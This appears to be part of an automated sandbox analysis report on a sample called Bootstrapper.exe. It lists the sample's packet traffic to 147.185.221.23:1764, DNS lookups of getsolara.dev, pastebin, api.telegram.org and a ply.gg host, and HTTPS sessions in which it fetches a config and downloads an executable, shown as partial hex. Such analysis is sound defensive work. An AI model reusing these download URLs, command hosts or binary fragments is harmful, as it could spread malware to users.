                                                                                        Oct 13, 2024 19:11:14.350996017 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351008892 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351022005 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351042032 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.351123095 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351167917 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.351351976 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351366043 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351381063 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351401091 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.351414919 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351454973 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.351635933 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351814032 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351828098 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351854086 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.351959944 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351974964 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351988077 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.351999044 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.352025032 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.352185011 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352344036 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352358103 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352379084 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352397919 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.352446079 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.352494001 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352662086 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.352705002 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.354098082 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354259014 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354274035 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354288101 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354301929 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354307890 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.354342937 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.354422092 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354435921 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354449987 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354461908 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.354465961 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.354487896 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.355180979 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.355195999 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.355211020 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.355231047 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.355252981 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.355331898 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.355345964 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.355454922 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359031916 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359046936 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359061956 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359075069 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359088898 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359103918 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359149933 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359468937 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359517097 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359651089 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359664917 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359668016 CEST500031764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359707117 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359833956 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359848976 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359865904 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359878063 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.359883070 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.359920025 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.360160112 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360173941 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360189915 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360210896 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.360291958 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360325098 CEST500021764192.168.2.5147.185.221.23
                                                                                        Oct 13, 2024 19:11:14.360476017 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360637903 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360651970 CEST176450002147.185.221.23192.168.2.5
                                                                                        Oct 13, 2024 19:11:14.360666990 CEST176450002147.185.221.23192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 13, 2024 19:08:57.851267099 CEST192.168.2.51.1.1.10xb617Standard query (0)getsolara.devA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:01.379659891 CEST192.168.2.51.1.1.10x1a71Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:04.048980951 CEST192.168.2.51.1.1.10xb638Standard query (0)79c62fd6.solaraweb-alj.pages.devA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:10.600555897 CEST192.168.2.51.1.1.10x245dStandard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:13.378854036 CEST192.168.2.51.1.1.10x393bStandard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:14.059592962 CEST192.168.2.51.1.1.10x2384Standard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:10:01.406114101 CEST192.168.2.51.1.1.10x19c7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:10:08.862101078 CEST192.168.2.51.1.1.10x2823Standard query (0)cash-hispanic.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:12:28.303239107 CEST192.168.2.51.1.1.10xb0f9Standard query (0)settings-ssl.xboxlive.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 13, 2024 19:08:57.858942032 CEST1.1.1.1192.168.2.50xb617No error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:08:57.858942032 CEST1.1.1.1192.168.2.50xb617No error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:01.387290001 CEST1.1.1.1192.168.2.50x1a71No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:01.387290001 CEST1.1.1.1192.168.2.50x1a71No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:01.387290001 CEST1.1.1.1192.168.2.50x1a71No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:04.068192959 CEST1.1.1.1192.168.2.50xb638No error (0)79c62fd6.solaraweb-alj.pages.dev172.66.44.59A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:04.068192959 CEST1.1.1.1192.168.2.50xb638No error (0)79c62fd6.solaraweb-alj.pages.dev172.66.47.197A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:10.609028101 CEST1.1.1.1192.168.2.50x245dNo error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:10.609028101 CEST1.1.1.1192.168.2.50x245dNo error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:10.609028101 CEST1.1.1.1192.168.2.50x245dNo error (0)edge-term4.roblox.comedge-term4-fra4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:10.609028101 CEST1.1.1.1192.168.2.50x245dNo error (0)edge-term4-fra4.roblox.com128.116.44.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:13.386914968 CEST1.1.1.1192.168.2.50x393bNo error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:13.386914968 CEST1.1.1.1192.168.2.50x393bNo error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:14.066869020 CEST1.1.1.1192.168.2.50x2384No error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:09:14.066869020 CEST1.1.1.1192.168.2.50x2384No error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:10:01.413292885 CEST1.1.1.1192.168.2.50x19c7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:10:08.875571012 CEST1.1.1.1192.168.2.50x2823No error (0)cash-hispanic.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 19:12:28.310775042 CEST1.1.1.1192.168.2.50xb0f9No error (0)settings-ssl.xboxlive.comsettings-ssl.xboxlive.com.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704104.21.93.274432860C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:08:58 UTC81OUTGET /asset/discord.json HTTP/1.1
                                                                                        Host: getsolara.dev
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:08:59 UTC827INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 17:08:58 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52"
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOILHNiVILEx2IEOmOpq0XAZLbtnnRMORmU8%2FC14Xzk2xSqsHhhrcvOwCIpAo9vEu0ZXXNSetv1CQUSNke7mfd2lGkDgF0ntthHa36sfGZl2o0YT5PRzssiV3Yn7ysu3"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Strict-Transport-Security: max-age=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef4bfb5f4401-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 17:08:59 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 78 52 43 61 43 37 63 64 42 6e 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                        Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                        2024-10-13 17:08:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549706172.67.19.244432860C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:02 UTC74OUTGET /raw/ZESVzSgK HTTP/1.1
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:09:02 UTC445INHTTP/1.1 404 Not Found
                                                                                        Date: Sun, 13 Oct 2024 17:09:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-frame-options: DENY
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1;mode=block
                                                                                        x-xss-protection: 1;mode=block
                                                                                        cache-control: public, max-age=1801
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 242
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef6379751977-EWR
                                                                                        2024-10-13 17:09:02 UTC697INData Raw: 32 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                                                                        Data Ascii: 2b2<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                                                                        2024-10-13 17:09:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549707104.21.93.274432860C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:03 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                        Host: getsolara.dev
                                                                                        2024-10-13 17:09:03 UTC835INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 17:09:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        ETag: W/"6d1289f045317b69a303a5bf178a762f"
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Db%2F7wOtjCKQ9uAeORaAV4SDyKFxaukW7D92vo1fkiuQo4O2jK5k6%2BtYk%2FHb9KO8qJIIdAmhcxNksiLoc21NVqegLn6ELIwx0SV%2FnkWEN00Km%2FvdFo7zwviZMmic2ntyv"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Strict-Transport-Security: max-age=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef6759a80f36-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 17:09:03 UTC534INData Raw: 33 36 32 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 32 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 65 61 64 63 33 63 39 30 62 62 31 61 34 32 36 37 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 30 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 37 39 63 36 32 66 64 36 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                        Data Ascii: 362{ "BootstrapperVersion": "1.22", "SupportedClient": "version-eadc3c90bb1a4267", "SoftwareVersion": "3.120", "BootstrapperUrl": "https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                        2024-10-13 17:09:03 UTC339INData Raw: 20 52 43 6f 6e 73 6f 6c 65 20 4c 69 62 72 61 72 79 20 46 75 6e 63 74 69 6f 6e 73 20 41 64 64 65 64 5c 6e 5c 74 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2d 3e 28 68 74 74 70 73 3a 2f 2f 73 79 6e 61 70 73 65 78 64 6f 63 73 2e 67 69 74 68 75 62 2e 69 6f 2f 63 75 73 74 6f 6d 2d 6c 75 61 2d 66 75 6e 63 74 69 6f 6e 73 2f 63 6f 6e 73 6f 6c 65 2d 66 75 6e 63 74 69 6f 6e 73 2f 29 5c 6e 5b 2b 5d 20 6d 65 73 73 61 67 65 62 6f 78 5c 6e 5b 2b 5d 20 6c 7a 34 20 63 6f 6d 70 72 65 73 73 20 26 20 64 65 63 6f 6d 70 72 65 73 73 20 68 6f 74 66 69 78 5c 6e 5b 2b 5d 20 52 65 61 64 66 69 6c 65 20 6e 6f 77 20 65 72 72 6f 72 73 20 69 66 20 74 68 65 20 66 69 6c 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 5c 6e 5b 2b 5d 20 53 6f 6d 65 20 63 68 61 6e 67 65 73 20 74 6f 20 67 65 74 2f
                                                                                        Data Ascii: RConsole Library Functions Added\n\tDocumentation->(https://synapsexdocs.github.io/custom-lua-functions/console-functions/)\n[+] messagebox\n[+] lz4 compress & decompress hotfix\n[+] Readfile now errors if the file doesn't exist\n[+] Some changes to get/
                                                                                        2024-10-13 17:09:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549708172.66.44.594432860C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 17:09:04 UTC120OUTGET /download/static/files/Bootstrapper.exe HTTP/1.1
                                                                                        Host: 79c62fd6.solaraweb-alj.pages.dev
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-13 17:09:04 UTC809INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 17:09:04 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 819200
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=0, must-revalidate
                                                                                        ETag: "82559c5191b04453f45ce7da0e3f3d1d"
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        x-robots-tag: noindex
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ScuAaWjbJqfAl1MvdOfGWiduLr5nCKO%2FHNPuzlK2%2BGL3vNQnJCxe%2Byrgq3GEUEv01a1oJTSFX16%2FJJLatI5xk1V%2BcQkEo7n6rbTWk6Iy%2FbmgWHlo2GUviuTl4YfPfr6%2BXZldj7iaq4IyphjBysfsYfGYnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d20ef6ffab743bb-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 4c 6c 00 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 76 0c 00 00 08 00 00 00 00 00 00 9a 94 0c 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0c 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdLlg"v @ `
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 0b 6f 10 0e 00 06 72 cb 04 00 70 28 2a 00 00 0a 28 2b 00 00 0a 13 0c 11 08 39 2c 00 00 00 11 07 28 0e 00 00 0a 3a 20 00 00 00 72 d5 04 00 70 28 16 00 00 0a 20 f4 01 00 00 28 2c 00 00 0a 11 07 28 07 00 00 06 38 11 00 00 00 11 0b 11 0c 11 0a 28 0a 00 00 06 39 01 00 00 00 2a 1f 23 28 2d 00 00 0a 13 0d 11 0b 28 09 00 00 06 3a 16 00 00 00 1f 0e 28 15 00 00 0a 72 17 05 00 70 28 16 00 00 0a 28 1b 00 00 06 72 ac 05 00 70 28 16 00 00 0a 20 f4 01 00 00 28 2c 00 00 0a 72 f6 05 00 70 28 2e 00 00 0a 13 0e 16 13 0f 38 41 00 00 00 11 0e 11 0f a3 05 00 00 01 13 10 11 10 6f 2f 00 00 0a dd 24 00 00 00 13 11 1f 0c 28 15 00 00 0a 72 04 06 00 70 11 11 6f 30 00 00 0a 28 03 00 00 0a 28 16 00 00 0a dd 00 00 00 00 11 0f 17 58 13 0f 11 0f 11 0e 8e 69 32 b7 72 4a 06 00 70 28 2e 00
                                                                                        Data Ascii: orp(*(+9,(: rp( (,(8(9*#(-(:(rp((rp( (,rp(.8Ao/$(rpo0((Xi2rJp(.
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 00 00 00 00 00 00 02 00 00 00 75 00 00 00 19 00 00 00 8e 00 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 e3 00 00 00 19 00 00 00 fc 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 dc 00 00 00 2f 00 00 00 0b 01 00 00 4b 00 00 00 19 00 00 01 00 00 00 00 6e 00 00 00 2f 00 00 00 9d 00 00 00 b9 00 00 00 19 00 00 01 00 00 00 00 06 00 00 00 2b 00 00 00 31 00 00 00 25 01 00 00 19 00 00 01 1b 30 0b 00 3e 00 00 00 07 00 00 11 73 17 00 00 0a 0a 06 02 6f 1a 0e 00 06 6f 18 00 00 0a 28 03 00 00 2b 0b 02 6f 12 0e 00 06 07 6f 23 0e 00 06 28 19 00 00 0a 0c dd 0d 00 00 00 06 39 06 00 00 00 06 6f 10 00 00 0a dc 08 2a 00 00 01 10 00 00 02 00 06 00 29 2f 00 0d 00 00 00 00 1b 30 0e 00 c8 00 00 00 08 00 00 11 02 6f 10 0e 00 06 28 38 00 00 0a 28 39 00 00 0a 7e 04 00 00 04 43 a2 00 00
                                                                                        Data Ascii: u/Kn/+1%0>soo(+oo#(9o*)/0o(8(9~C
                                                                                        2024-10-13 17:09:04 UTC1369INData Raw: 24 19 00 00 01 1b 30 06 00 80 00 00 00 0f 00 00 11 72 b9 0d 00 70 0a 28 49 00 00 0a 72 1d 0e 00 70 28 2b 00 00 0a 0b 73 17 00 00 0a 0c 08 06 07 6f 3a 00 00 0a 07 72 5b 0e 00 70 28 19 00 00 06 72 7d 0e 00 70 28 16 00 00 0a dd 41 00 00 00 0d 1f 0c 28 15 00 00 0a 72 cf 0e 00 70 09 6f 30 00 00 0a 28 03 00 00 0a 28 16 00 00 0a dd 1f 00 00 00 07 28 1a 00 00 0a 39 06 00 00 00 07 28 36 00 00 0a dc 08 39 06 00 00 00 08 6f 10 00 00 0a dc 2a 01 28 00 00 00 00 1c 00 22 3e 00 22 19 00 00 01 02 00 1c 00 44 60 00 12 00 00 00 00 02 00 1c 00 56 72 00 0d 00 00 00 00 1b 30 07 00 55 00 00 00 10 00 00 11 72 17 0f 00 70 0a 7e 45 00 00 0a 06 6f 46 00 00 0a 0b 07 39 27 00 00 00 07 72 81 0f 00 70 6f 48 00 00 0a 0c 08 39 0e 00 00 00 08 28 4a 00 00 0a 17 fe 01 38 01 00 00 00 16 0d
                                                                                        Data Ascii: $0rp(Irp(+so:r[p(r}p(A(rpo0(((9(69o*(">"D`Vr0Urp~EoF9'rpoH9(J8
